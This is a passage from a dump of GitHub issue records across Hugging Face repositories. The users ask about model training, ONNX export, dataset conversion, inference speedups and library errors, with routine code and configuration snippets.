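\r\n\r\nFor reference, a minimal loading sketch (assuming the `--output_dir` from the training script below, and that it contains a `pytorch_lora_weights.safetensors` file, as the diffusers LoRA scripts usually save) might look like this:\r\n\r\n```python\r\nimport torch\r\nfrom diffusers import DiffusionPipeline, LCMScheduler\r\n\r\n# Load the same teacher/base model that was used for distillation\r\npipe = DiffusionPipeline.from_pretrained(\r\n    \"/ai/yzy/latent-consistency-model-main/stable-diffusion-v1-5\",\r\n    torch_dtype=torch.float16,\r\n).to(\"cuda\")\r\n\r\n# LCM sampling needs the LCMScheduler instead of the default scheduler\r\npipe.scheduler = LCMScheduler.from_config(pipe.scheduler.config)\r\n\r\n# Attach the distilled LCM-LoRA weights from the training output directory\r\npipe.load_lora_weights(\"/ai/yzy/latent-consistency-model-main/output_sd001\")\r\n\r\n# LCM typically uses very few steps and low guidance\r\nimage = pipe(\"a photo of a cat\", num_inference_steps=4, guidance_scale=1.0).images[0]\r\nimage.save(\"lcm_lora_test.png\")\r\n```\r\n\r\n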
Thank you very much!\r\nThe training script:\r\n```bash\r\n#!/bin/bash\r\n\r\n# Define the variables\r\nPRETRAINED_TEACHER_MODEL=\"/ai/yzy/latent-consistency-model-main/stable-diffusion-v1-5\"\r\nOUTPUT_DIR=\"/ai/yzy/latent-consistency-model-main/output_sd001\"\r\nRESOLUTION=512\r\nLORA_RANK=64\r\nLEARNING_RATE=1e-6\r\nLOSS_TYPE='huber'\r\nADAM_WEIGHT_DECAY=0.0\r\nMAX_TRAIN_STEPS=1000\r\nMAX_TRAIN_SAMPLES=4000000\r\nDATALOADER_NUM_WORKERS=4\r\nTRAIN_SHARDS_PATH_OR_URL='/ai/yzy/latent-consistency-model-main/00000.tar'\r\nVALIDATION_STEPS=200\r\nCHECKPOINTING_STEPS=200\r\nCHECKPOINTS_TOTAL_LIMIT=10\r\nTRAIN_BATCH_SIZE=8\r\nGRADIENT_ACCUMULATION_STEPS=1\r\nSEED=453645634\r\n\r\n# Run the training script\r\npython ./LCM_Training_Script/consistency_distillation/train_lcm_distill_lora_sd_wds.py \\\r\n --pretrained_teacher_model=$PRETRAINED_TEACHER_MODEL \\\r\n --output_dir=$OUTPUT_DIR \\\r\n --mixed_precision=fp16 \\\r\n --resolution=$RESOLUTION \\\r\n --lora_rank=$LORA_RANK \\\r\n --learning_rate=$LEARNING_RATE \\\r\n --loss_type=$LOSS_TYPE \\\r\n --adam_weight_decay=$ADAM_WEIGHT_DECAY \\\r\n --max_train_steps=$MAX_TRAIN_STEPS \\\r\n --max_train_samples=$MAX_TRAIN_SAMPLES \\\r\n --dataloader_num_workers=$DATALOADER_NUM_WORKERS \\\r\n --train_shards_path_or_url=$TRAIN_SHARDS_PATH_OR_URL \\\r\n --validation_steps=$VALIDATION_STEPS \\\r\n --checkpointing_steps=$CHECKPOINTING_STEPS \\\r\n --checkpoints_total_limit=$CHECKPOINTS_TOTAL_LIMIT \\\r\n --train_batch_size=$TRAIN_BATCH_SIZE \\\r\n --gradient_checkpointing \\\r\n --enable_xformers_memory_efficient_attention \\\r\n --gradient_accumulation_steps=$GRADIENT_ACCUMULATION_STEPS \\\r\n --use_8bit_adam \\\r\n --resume_from_checkpoint=latest \\\r\n --seed=$SEED\r\n```\r\n\r\nThe output:\r\n![image](https://github.com/user-attachments/assets/5fb9a474-52d9-4d2f-85e4-dd5c3e0902db)\r\n", "url": "https://github.com/huggingface/diffusers/issues/10411", "state": "closed", "labels": [], "created_at": "2024-12-30T12:06:07Z", "updated_at": "2024-12-31T07:21:40Z", "user": "yangzhenyu6" }, { "repo": "huggingface/text-embeddings-inference", "number": 461, "title": "How to Set the Threshold for gte-multilingual-reranker", "body": "I want to use the gte-multilingual-reranker-base model to re-rank the retrieved documents and discard some of them based on a threshold.
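\r\n\r\nOne common recipe (a sketch, assuming the reranker emits a single raw relevance logit per query-document pair) is to map the logit into [0, 1] with a sigmoid and keep only documents above a cutoff:\r\n\r\n```python\r\nimport math\r\n\r\ndef sigmoid(x: float) -> float:\r\n    return 1.0 / (1.0 + math.exp(-x))\r\n\r\n# Hypothetical raw logits returned by the reranker for one query\r\nlogits = [2.3, 0.1, -1.7]\r\nscores = [sigmoid(x) for x in logits]  # -> approx [0.91, 0.52, 0.15]\r\n\r\n# The cutoff is not universal: it should be tuned on labeled validation pairs\r\nTHRESHOLD = 0.5\r\nkept = [i for i, s in enumerate(scores) if s >= THRESHOLD]\r\nprint(kept)  # -> [0, 1]\r\n```\r\n\r\n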
I have seen examples on Hugging Face where the logits are used as the output scores, but how can I determine the appropriate threshold?", "url": "https://github.com/huggingface/text-embeddings-inference/issues/461", "state": "open", "labels": [], "created_at": "2024-12-30T11:39:48Z", "updated_at": "2025-02-09T06:29:02Z", "user": "ketusrai" }, { "repo": "huggingface/optimum", "number": 2140, "title": "KeyError: 'swinv2 model type is not supported yet in NormalizedConfig.", "body": "### System Info\n\n```shell\nGoogle Colab\r\nT4 GPU\r\ntransformers Version: 4.47.1\r\noptimum Version: 1.24.0.dev0\n```\n\n\n### Who can help?\n\n@michaelbenayoun, @JingyaHuang, @echarlaix\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nfrom optimum.onnxruntime import ORTModelForVision2Seq\r\nmodel = ORTModelForVision2Seq.from_pretrained(\"/content/swin-xlm-image-recognition\", export=True, use_cache=False)\r\nmodel.save_pretrained(\"swin-xlm-image-recognition-onnx\")\n\n### Expected behavior\n\nHow to solve this issue? I am trying to convert my VisionEncoderDecoderModel to onnx using optimum, but I am getting this error: `KeyError: 'swinv2 model type is not supported yet in NormalizedConfig. Only albert, bart, bert, blenderbot, blenderbot-small, bloom, falcon, camembert, codegen, cvt, deberta, deberta-v2, deit, distilbert, donut-swin, electra, encoder-decoder, gemma, gpt2, gpt-bigcode, gpt-neo, gpt-neox, gptj, imagegpt, llama, longt5, marian, markuplm, mbart, mistral, mixtral, mpnet, mpt, mt5, m2m-100, nystromformer, opt, pegasus, pix2struct, phi, phi3, phi3small, poolformer, regnet, resnet, roberta, segformer, speech-to-text, splinter, t5, trocr, vision-encoder-decoder, vit, whisper, xlm-roberta, yolos, qwen2, granite are supported. 
If you want to support swinv2 please propose a PR or open up an issue.'`\r\n\r\nThe encoder is \"swinv2\" and the decoder is \"xlm-roberta\".", "url": "https://github.com/huggingface/optimum/issues/2140", "state": "open", "labels": [ "bug" ], "created_at": "2024-12-30T10:29:14Z", "updated_at": "2024-12-30T10:29:14Z", "comments": 0, "user": "Billybeast2003" }, { "repo": "huggingface/optimum-intel", "number": 1096, "title": "How to use trainer.train() with OVModelForCausalLM() model", "body": "I am currently converting a local LLM to OpenVINO. I would like to fine-tune my model with the Trainer function, but I get an error stating: AttributeError: 'OVModelForCausalLM' object has no attribute 'named_children'\r\n\r\nPlease let me know if there is a way to fine-tune OpenVINO models that are loaded with OVModelForCausalLM().\r\n\r\nAttached is my script:\r\n[Fine_Tuning_mistral_7b_v3 (2).zip](https://github.com/user-attachments/files/18271287/Fine_Tuning_mistral_7b_v3.2.zip)\r\n", "url": "https://github.com/huggingface/optimum-intel/issues/1096", "state": "closed", "labels": [], "created_at": "2024-12-29T23:54:26Z", "updated_at": "2025-02-27T14:54:20Z", "user": "CJames1261" }, { "repo": "huggingface/trl", "number": 2523, "title": "How to solve the situation where the tokenizer of the reward model is inconsistent with the tokenizer of the actor model\uff1f", "body": "", "url": "https://github.com/huggingface/trl/issues/2523", "state": "open", "labels": [ "\u2753 question" ], "created_at": "2024-12-27T09:43:06Z", "updated_at": "2024-12-28T06:26:16Z", "user": "stephen-nju" }, { "repo": "huggingface/peft", "number": 2298, "title": "QDoRA support", "body": "### Feature request\n\nIs it possible to use QDoRA with PEFT?\n\n### Motivation\n\nQDoRA is better than QLoRA and performs like full fine-tuning.\n\n### Your contribution\n\n```python\r\npeft_config = LoraConfig(\r\n    r=8, \r\n    lora_alpha=32, \r\n    lora_dropout=0.1,\r\n    qdora=True  # adding qdora (proposed flag)\r\n)\r\n```", "url": "https://github.com/huggingface/peft/issues/2298", "state": "closed", "labels": [], "created_at": "2024-12-27T04:47:54Z", "updated_at": "2025-01-03T12:26:58Z", "comments": 2, "user": "imrankh46" }, { "repo": "huggingface/smolagents", "number": 2, "title": "How to call OpenAI-like models through an API?", "body": "How to call OpenAI-like models through an API?", "url": "https://github.com/huggingface/smolagents/issues/2", "state": "closed", "labels": [], "created_at": "2024-12-27T04:34:35Z", "updated_at": "2024-12-29T21:58:10Z", "user": "win4r" }, { "repo": "huggingface/datasets", "number": 7347, "title": "Converting Arrow to WebDataset TAR Format for Offline Use", "body": "### Feature request\n\nHi, \r\n\r\nI've downloaded an Arrow-formatted dataset offline using the Hugging Face datasets library by:\r\n\r\n```\r\nimport json\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\"pixparse/cc3m-wds\")\r\ndataset.save_to_disk(\"./cc3m_1\") \r\n```\r\n\r\nNow I need to convert it to WebDataset's TAR format for offline data ingestion. \r\nIs there a straightforward method to achieve this conversion without an internet connection?
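\r\n\r\nOne possible offline route (a sketch; it assumes the saved dataset exposes image and caption columns named \"jpg\" and \"txt\", which must be checked against the actual schema) is to iterate over the on-disk dataset and write TAR shards with webdataset's ShardWriter:\r\n\r\n```python\r\nimport io\r\nimport os\r\n\r\nimport webdataset as wds\r\nfrom datasets import load_from_disk\r\n\r\n# Re-open the dataset that was saved with save_to_disk (no network needed)\r\ndataset = load_from_disk(\"./cc3m_1\")[\"train\"]\r\n\r\nos.makedirs(\"./cc3m_webdataset\", exist_ok=True)\r\nwith wds.ShardWriter(\"./cc3m_webdataset/shard-%06d.tar\", maxcount=10000) as sink:\r\n    for i, example in enumerate(dataset):\r\n        buf = io.BytesIO()\r\n        example[\"jpg\"].save(buf, format=\"JPEG\")  # assumes a PIL image column\r\n        sink.write({\r\n            \"__key__\": f\"{i:08d}\",\r\n            \"jpg\": buf.getvalue(),\r\n            \"txt\": example[\"txt\"],\r\n        })\r\n```\r\n\r\n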
Can I simply convert it by \r\n```\r\ntar -cvf \r\n```\r\n\r\nBtw, when I tried:\r\n```\r\nimport webdataset as wds\r\nfrom huggingface_hub import get_token\r\nfrom torch.utils.data import DataLoader\r\n\r\nhf_token = get_token()\r\nurl = \"https://huggingface.co/datasets/timm/imagenet-12k-wds/resolve/main/imagenet12k-train-{{0000..1023}}.tar\"\r\nurl = f\"pipe:curl -s -L {url} -H 'Authorization:Bearer {hf_token}'\"\r\ndataset = wds.WebDataset(url).decode()\r\ndataset.save_to_disk(\"./cc3m_webdataset\") \r\n```\r\nan error occurred:\r\n```\r\nAttributeError: 'WebDataset' object has no attribute 'save_to_disk'\r\n```\r\n\r\nThanks a lot!\n\n### Motivation\n\nConverting Arrow to WebDataset TAR Format\n\n### Your contribution\n\nNo clue yet", "url": "https://github.com/huggingface/datasets/issues/7347", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-12-27T01:40:44Z", "updated_at": "2024-12-31T17:38:00Z", "comments": 4, "user": "katie312" }, { "repo": "huggingface/transformers.js", "number": 1118, "title": "Trying to use custom finetuned Whisper Model with ", "body": "### Question\n\n@xenova I am trying to use our own fine-tuned Whisper model https://huggingface.co/medxcribe/whisper-base.en with\r\n\r\nhttps://huggingface.co/spaces/Xenova/whisper-web. I have uploaded it into a separate repo for reference: https://huggingface.co/medxcribe/whisper-base-onnx.en.\r\n\r\nWe have converted the fine-tuned medxcribe/whisper-base.en using these commands: \r\n\r\n```bash\r\npip install onnx==1.17.0\r\npip install onnxruntime==1.20.1\r\npip install transformers==4.35.2\r\noptimum-cli export onnx --model medxcribe/whisper-base.en whisper_onnx --task automatic-speech-recognition-with-past --opset 14\r\n```\r\n\r\nBut unfortunately, while loading whisper-web, we are stuck with the error below:\r\n\r\n```\r\nCan't create a session\"\r\n at t.createSessionFinalize (http://localhost:4173/assets/worker-1c2c88a7.js:1789:105945)\r\n at t.createSession (http://localhost:4173/assets/worker-1c2c88a7.js:1789:106543)\r\n at t.createSession (http://localhost:4173/assets/worker-1c2c88a7.js:1789:98867)\r\n at t.OnnxruntimeWebAssemblySessionHandler.loadModel (http://localhost:4173/assets/worker-1c2c88a7.js:1789:101717)\r\n at Object.createSessionHandler (http://localhost:4173/assets/worker-1c2c88a7.js:9:115048)\r\n at dn.create (http://localhost:4173/assets/worker-1c2c88a7.js:1:14653)\r\n at async constructSession (http://localhost:4173/assets/worker-1c2c88a7.js:1810:22248)\r\n at async Promise.all (index 2)\r\n at async WhisperForConditionalGeneration.from_pretrained (http://localhost:4173/assets/worker-1c2c88a7.js:1810:29662)\r\n at async AutoModelForSpeechSeq2Seq.from_pretrained (http://localhost:4173/assets/worker-1c2c88a7.js:1810:77285)\r\n```\r\n\r\nAny suggestions? At a high level, there seems to be a problem with the generated ONNX files. ", "url": "https://github.com/huggingface/transformers.js/issues/1118", "state": "open", "labels": [ "question" ], "created_at": "2024-12-26T20:18:36Z", "updated_at": "2024-12-26T20:18:36Z", "user": "vijaim" }, { "repo": "huggingface/finetrainers", "number": 153, "title": "How to generate result of validation and resolution. ", "body": "Hi author:\r\nI am using your Hunyuan fine-tuning bash script to fine-tune a LoRA on my own dataset with an original resolution of 1080p. But I find the model can only run on videos whose height and width are both divisible by 32.
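\r\n\r\n(For reference, a quick check of some common resolutions against this divisible-by-32 constraint; the resolutions below are just examples:)\r\n\r\n```python\r\n# Which common resolutions satisfy height % 32 == 0 and width % 32 == 0?\r\nfor h, w in [(360, 640), (720, 1280), (1080, 1920)]:\r\n    ok = h % 32 == 0 and w % 32 == 0\r\n    print(f\"{w}x{h}: {'ok' if ok else 'needs resizing/cropping'}\")\r\n\r\n# 640x360:   360 % 32 == 8  -> fails\r\n# 1280x720:  720 % 32 == 16 -> fails\r\n# 1920x1080: 1080 % 32 == 24 -> fails (the widths here are all fine)\r\n```\r\n\r\n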
Can the model also be trained on video with 360p or 720p and why?", "url": "https://github.com/huggingface/finetrainers/issues/153", "state": "closed", "labels": [], "created_at": "2024-12-26T15:21:22Z", "updated_at": "2025-01-10T23:38:39Z", "user": "Aristo23333" }, { "repo": "huggingface/lerobot", "number": 597, "title": "Inquiry About Support for RDT-1B Model", "body": "Hi,\r\nI would like to extend my heartfelt thanks for maintaining such an outstanding codebase. Your dedication and hard work have significantly contributed to advancements in the robotics field, and I truly appreciate the resources and support your community provides.\r\n\r\nI am reaching out to inquire whether there are any plans to support the RDT-1B model from the [RoboticsDiffusionTransformer](https://github.com/thu-ml/RoboticsDiffusionTransformer) repository within the LeRobot framework. The RDT-1B model appears to offer promising capabilities for robotics applications, and integrating it could potentially enhance the functionalities and performance of projects built on LeRobot.\r\n\r\nCould you please let me know if there are any intentions to incorporate this model in the future, or if there are any existing efforts towards this integration? Additionally, if there are ways the community can assist or contribute to this effort, I would be eager to participate.\r\n\r\nThank you once again for all your contributions and support. I look forward to your response.", "url": "https://github.com/huggingface/lerobot/issues/597", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-12-26T11:12:58Z", "updated_at": "2025-10-08T20:52:51Z", "user": "Robert-hua" }, { "repo": "huggingface/diffusers", "number": 10383, "title": "[Request] Optimize HunyuanVideo Inference Speed with ParaAttention", "body": "Hi guys,\r\n\r\nFirst and foremost, I would like to commend you for the incredible work on the `diffusers` library. It has been an invaluable resource for my projects.\r\n\r\nI am writing to suggest an enhancement to the inference speed of the `HunyuanVideo` model. We have found that using [ParaAttention](https://github.com/chengzeyi/ParaAttention) can significantly speed up the inference of HunyuanVideo. ParaAttention provides context parallel attention that works with `torch.compile`, supporting Ulysses Style and Ring Style parallelism. I hope we could add a doc or introduction of how to make `HunyuanVideo` of `diffusers` run faster with `ParaAttention`. Besides `HunyuanVideo`, `FLUX`, `Mochi` and `CogVideoX` are also supported.\r\n\r\nSteps to Optimize HunyuanVideo Inference with `ParaAttention`:\r\n\r\n# Install ParaAttention:\r\n\r\n```bash\r\npip3 install para-attn\r\n# Or visit https://github.com/chengzeyi/ParaAttention.git to see detailed instructions\r\n```\r\n\r\n# Example Script:\r\nHere is an example script to run HunyuanVideo with ParaAttention:\r\n\r\n```python\r\nimport torch\r\nimport torch.distributed as dist\r\nfrom diffusers import HunyuanVideoPipeline, HunyuanVideoTransformer3DModel\r\nfrom diffusers.utils import export_to_video\r\n\r\ndist.init_process_group()\r\n\r\n# [rank1]: RuntimeError: Expected mha_graph->execute(handle, variant_pack, workspace_ptr.get()).is_good() to be true, but got false. (Could this error message be improved? 
If so, please report an enhancement request to PyTorch.)\r\ntorch.backends.cuda.enable_cudnn_sdp(False)\r\n\r\nmodel_id = \"tencent/HunyuanVideo\"\r\ntransformer = HunyuanVideoTransformer3DModel.from_pretrained(\r\n model_id,\r\n subfolder=\"transformer\",\r\n torch_dtype=torch.bfloat16,\r\n revision=\"refs/pr/18\",\r\n)\r\npipe = HunyuanVideoPipeline.from_pretrained(\r\n model_id,\r\n transformer=transformer,\r\n torch_dtype=torch.float16,\r\n revision=\"refs/pr/18\",\r\n).to(f\"cuda:{dist.get_rank()}\")\r\n\r\npipe.vae.enable_tiling(\r\n # Make it runnable on GPUs with 48GB memory\r\n # tile_sample_min_height=128,\r\n # tile_sample_stride_height=96,\r\n # tile_sample_min_width=128,\r\n # tile_sample_stride_width=96,\r\n # tile_sample_min_num_frames=32,\r\n # tile_sample_stride_num_frames=24,\r\n)\r\n\r\nfrom para_attn.context_parallel import init_context_parallel_mesh\r\nfrom para_attn.context_parallel.diffusers_adapters import parallelize_pipe\r\nfrom para_attn.parallel_vae.diffusers_adapters import parallelize_vae\r\n\r\nmesh = init_context_parallel_mesh(\r\n pipe.device.type,\r\n)\r\nparallelize_pipe(\r\n pipe,\r\n mesh=mesh,\r\n)\r\nparallelize_vae(pipe.vae, mesh=mesh._flatten())\r\n\r\n# pipe.enable_model_cpu_offload(gpu_id=dist.get_rank())\r\n\r\n# torch._inductor.config.reorder_for_compute_comm_overlap = True\r\n# pipe.transformer = torch.compile(pipe.transformer, mode=\"max-autotune-no-cudagraphs\")\r\n\r\noutput = pipe(\r\n prompt=\"A cat walks on the grass, realistic\",\r\n height=720,\r\n width=1280,\r\n num_frames=129,\r\n num_inference_steps=30,\r\n output_type=\"pil\" if dist.get_rank() == 0 else \"pt\",\r\n).frames[0]\r\n\r\nif dist.get_rank() == 0:\r\n print(\"Saving video to hunyuan_video.mp4\")\r\n export_to_video(output, \"hunyuan_video.mp4\", fps=15)\r\n\r\ndist.destroy_process_group()\r\n```\r\n\r\nSave the above code to `run_hunyuan_video.py` and run it with torchrun:\r\n\r\n```bash\r\ntorchrun --nproc_per_node=2 run_hunyuan_video.py\r\n```\r\n\r\nThe generated video on 2xH100:\r\n\r\nhttps://github.com/user-attachments/assets/e67838a7-5261-452e-9bf0-9f186611c3b7\r\n\r\nBy following these steps, users can leverage `ParaAttention` to achieve faster inference times with `HunyuanVideo` on multiple GPUs.\r\n\r\nThank you for considering this suggestion. I believe it could greatly benefit the community and enhance the performance of `HunyuanVideo`. 
Please let me know if there are any questions or further clarifications needed.", "url": "https://github.com/huggingface/diffusers/issues/10383", "state": "closed", "labels": [ "roadmap" ], "created_at": "2024-12-25T15:07:53Z", "updated_at": "2025-01-16T18:05:15Z", "comments": 10, "user": "chengzeyi" }, { "repo": "huggingface/lerobot", "number": 596, "title": "How to achieve multiple tasks on the basis of LeRobot\uff1f", "body": "LeRobot can achieve single tasks (such as inserting or transferring blocks). How can multiple tasks be achieved on the basis of LeRobot (such as first recognizing and classifying objects, and then putting the objects in boxes in order)?\r\nPlease give me some ideas.", "url": "https://github.com/huggingface/lerobot/issues/596", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2024-12-25T12:20:37Z", "updated_at": "2025-10-17T11:38:20Z", "user": "wangwisdom" }, { "repo": "huggingface/diffusers", "number": 10375, "title": "[low priority] Please fix links in documentation", "body": "https://huggingface.co/docs/diffusers/main/en/api/pipelines/hunyuan_video\r\n\r\nBoth links are broken\r\n\r\nMake sure to check out the Schedulers [guide](https://huggingface.co/docs/diffusers/main/en/using-diffusers/schedulers.md) to learn how to explore the tradeoff between scheduler speed and quality, and see the [reuse components across pipelines](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading.md#reuse-a-pipeline) section to learn how to efficiently load the same components into multiple pipelines.", "url": "https://github.com/huggingface/diffusers/issues/10375", "state": "closed", "labels": [], "created_at": "2024-12-25T09:04:33Z", "updated_at": "2024-12-28T20:01:27Z", "comments": 0, "user": "nitinmukesh" }, { "repo": "huggingface/diffusers", "number": 10374, "title": "Is there any plan to support TeaCache for training-free acceleration?", "body": "TeaCache is a training-free inference acceleration method for visual generation. TeaCache currently supports HunyuanVideo, CogVideoX, Open-Sora, Open-Sora-Plan and Latte. TeaCache can speed up HunyuanVideo 2x without much visual quality degradation. For example, the inference for a 720p, 129-frame video takes around 50 minutes on a single A800 GPU, while TeaCache can speed it up to around 23 minutes. Thanks for your efforts!\r\nhttps://github.com/LiewFeng/TeaCache.\r\n", "url": "https://github.com/huggingface/diffusers/issues/10374", "state": "open", "labels": [ "wip" ], "created_at": "2024-12-25T05:00:23Z", "updated_at": "2025-01-27T01:28:53Z", "comments": 4, "user": "LiewFeng" }, { "repo": "huggingface/chat-ui", "number": 1633, "title": "docker run is not working", "body": "I'm running the following:\r\n```\r\ndocker run -p 3000:3000 --env-file env.local huggingface/chat-ui\r\n```\r\nThe env file has the following set: `HF_TOKEN`, `MONGODB_URL` and `MODELS`. The container prints the following:\r\n```\r\nListening on 0.0.0.0:3000\r\n```\r\n\r\nHowever, on hitting `localhost:3000`, I get a blank page with `Not found`.\r\n\r\nI can repro this consistently.
Can anyone who has been able to get it working with Docker share how?", "url": "https://github.com/huggingface/chat-ui/issues/1633", "state": "open", "labels": [ "support" ], "created_at": "2024-12-23T08:36:09Z", "updated_at": "2025-01-06T07:30:46Z", "comments": 1, "user": "sebastiangonsal" }, { "repo": "huggingface/peft", "number": 2293, "title": "Is it possible to add LoRA on specific heads?", "body": "### Feature request\n\nCould I add LoRA to only some selected heads of the model?\r\nI read some documentation [here](https://huggingface.co/docs/peft/developer_guides/custom_models), but I am still not sure how to implement my goal.\n\n### Motivation\n\nThe current LoraConfig allows users to decide which matrices to add LoRA to; more fine-grained control over which heads to add LoRA to would be beneficial for developers.\n\n### Your contribution\n\nI would appreciate some tips on how to implement this.", "url": "https://github.com/huggingface/peft/issues/2293", "state": "closed", "labels": [], "created_at": "2024-12-22T19:57:54Z", "updated_at": "2025-12-14T10:07:49Z", "comments": 12, "user": "SpeeeedLee" }, { "repo": "huggingface/datasets", "number": 7344, "title": "HfHubHTTPError: 429 Client Error: Too Many Requests for URL when trying to access SlimPajama-627B or c4 on TPUs", "body": "### Describe the bug\n\nI am trying to run some trainings on Google's TPUs using Huggingface's DataLoader on [SlimPajama-627B](https://huggingface.co/datasets/cerebras/SlimPajama-627B) and [c4](https://huggingface.co/datasets/allenai/c4), but I end up running into a `429 Client Error: Too Many Requests for URL` error when I call `load_dataset`. The even odder part is that I am able to successfully run trainings with the [wikitext dataset](https://huggingface.co/datasets/Salesforce/wikitext).
Is there something I need to setup to specifically train with SlimPajama or C4 with TPUs because I am not clear why I am getting these errors.\r\n\r\n\n\n### Steps to reproduce the bug\n\nThese are the commands you could run to produce the error below but you will require a ClearML account (you can create one [here](https://app.clear.ml/login?redirect=%2Fdashboard)) with a queue setup to run on Google TPUs\r\n```bash\r\ngit clone https://github.com/clankur/muGPT.git\r\ncd muGPT\r\npython -m train --config-name=slim_v4-32_84m.yaml +training.queue={NAME_OF_CLEARML_QUEUE}\r\n```\r\n\r\nThe error I see:\r\n```\r\nTraceback (most recent call last):\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/clearml/binding/hydra_bind.py\", line 230, in _patched_task_function\r\n return task_function(a_config, *a_args, **a_kwargs)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/task_repository/muGPT.git/train.py\", line 1037, in main\r\n main_contained(config, logger)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/task_repository/muGPT.git/train.py\", line 840, in main_contained\r\n loader = get_loader(\"train\", config.training_data, config.training.tokens)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/task_repository/muGPT.git/input_loader.py\", line 549, in get_loader\r\n return HuggingFaceDataLoader(split, config, token_batch_params)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/task_repository/muGPT.git/input_loader.py\", line 395, in __init__\r\n self.dataset = load_dataset(\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 2112, in load_dataset\r\n builder_instance = load_dataset_builder(\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 1798, in load_dataset_builder\r\n dataset_module = dataset_module_factory(\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 1495, in dataset_module_factory\r\n raise e1 from None\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 1479, in dataset_module_factory\r\n ).get_module()\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 1034, in get_module\r\n else get_data_patterns(base_path, download_config=self.download_config)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/data_files.py\", line 457, in get_data_patterns\r\n return _get_data_files_patterns(resolver)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/data_files.py\", line 248, in _get_data_files_patterns\r\n data_files = pattern_resolver(pattern)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/data_files.py\", line 340, in resolve_pattern\r\n for filepath, info in fs.glob(pattern, detail=True).items()\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_file_system.py\", line 409, in glob\r\n return super().glob(path, **kwargs)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/lib/python3.10/site-packages/fsspec/spec.py\", line 602, in glob\r\n allpaths = self.find(root, maxdepth=depth, withdirs=True, detail=True, **kwargs)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_file_system.py\", line 429, in find\r\n out = self._ls_tree(path, recursive=True, refresh=refresh, revision=resolved_path.revision, **kwargs)\r\n File 
\"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_file_system.py\", line 358, in _ls_tree\r\n self._ls_tree(\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_file_system.py\", line 375, in _ls_tree\r\n for path_info in tree:\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_api.py\", line 3080, in list_repo_tree\r\n for path_info in paginate(path=tree_url, headers=headers, params={\"recursive\": recursive, \"expand\": expand}):\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/utils/_pagination.py\", line 46, in paginate\r\n hf_raise_for_status(r)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/utils/_http.py\", line 477, in hf_raise_for_status\r\n raise _format(HfHubHTTPError, str(e), response) from e\r\nhuggingface_hub.errors.HfHubHTTPError: 429 Client Error: Too Many Requests for url: https://huggingface.co/api/datasets/cerebras/SlimPajama-627B/tree/2d0accdd58c5d5511943ca1f5ff0e3eb5e293543?recursive=True&", "url": "https://github.com/huggingface/datasets/issues/7344", "state": "closed", "labels": [], "created_at": "2024-12-22T16:30:07Z", "updated_at": "2025-01-15T05:32:00Z", "comments": 2, "user": "clankur" }, { "repo": "huggingface/diffusers", "number": 10345, "title": "safetensor streaming in from_single_file_loading()", "body": "can we add support for streaming safetensors while loading using `from_single_file`.\r\nsource:https://github.com/run-ai/runai-model-streamer\r\n\r\nexample:\r\n```python\r\nfrom runai_model_streamer import SafetensorsStreamer\r\n\r\nfile_path = \"/path/to/file.safetensors\"\r\n\r\nwith SafetensorsStreamer() as streamer:\r\n streamer.stream_file(file_path)\r\n for name, tensor in streamer.get_tensors():\r\n tensor.to('CUDA:0')\r\n```", "url": "https://github.com/huggingface/diffusers/issues/10345", "state": "closed", "labels": [ "stale" ], "created_at": "2024-12-22T13:27:46Z", "updated_at": "2025-01-21T15:07:58Z", "comments": 2, "user": "AbhinavJangra29" }, { "repo": "huggingface/accelerate", "number": 3309, "title": "deepspeed zero3 how to save custom model\uff1f", "body": "DeepSpeedEngine(\r\n (module): LLMDecoder(\r\n (model): Qwen2ForSequenceClassification(\r\n (model): Qwen2Model(\r\n (embed_tokens): Embedding(151936, 1536)\r\n (layers): ModuleList(\r\n (0-27): 28 x Qwen2DecoderLayer(\r\n (self_attn): Qwen2SdpaAttention(\r\n (q_proj): Linear(in_features=1536, out_features=1536, bias=True)\r\n (k_proj): Linear(in_features=1536, out_features=256, bias=True)\r\n (v_proj): Linear(in_features=1536, out_features=256, bias=True)\r\n (o_proj): Linear(in_features=1536, out_features=1536, bias=False)\r\n (rotary_emb): Qwen2RotaryEmbedding()\r\n )\r\n (mlp): Qwen2MLP(\r\n (gate_proj): Linear(in_features=1536, out_features=8960, bias=False)\r\n (up_proj): Linear(in_features=1536, out_features=8960, bias=False)\r\n (down_proj): Linear(in_features=8960, out_features=1536, bias=False)\r\n (act_fn): SiLU()\r\n )\r\n (input_layernorm): Qwen2RMSNorm((0,), eps=1e-06)\r\n (post_attention_layernorm): Qwen2RMSNorm((0,), eps=1e-06)\r\n )\r\n )\r\n (norm): Qwen2RMSNorm((0,), eps=1e-06)\r\n (rotary_emb): 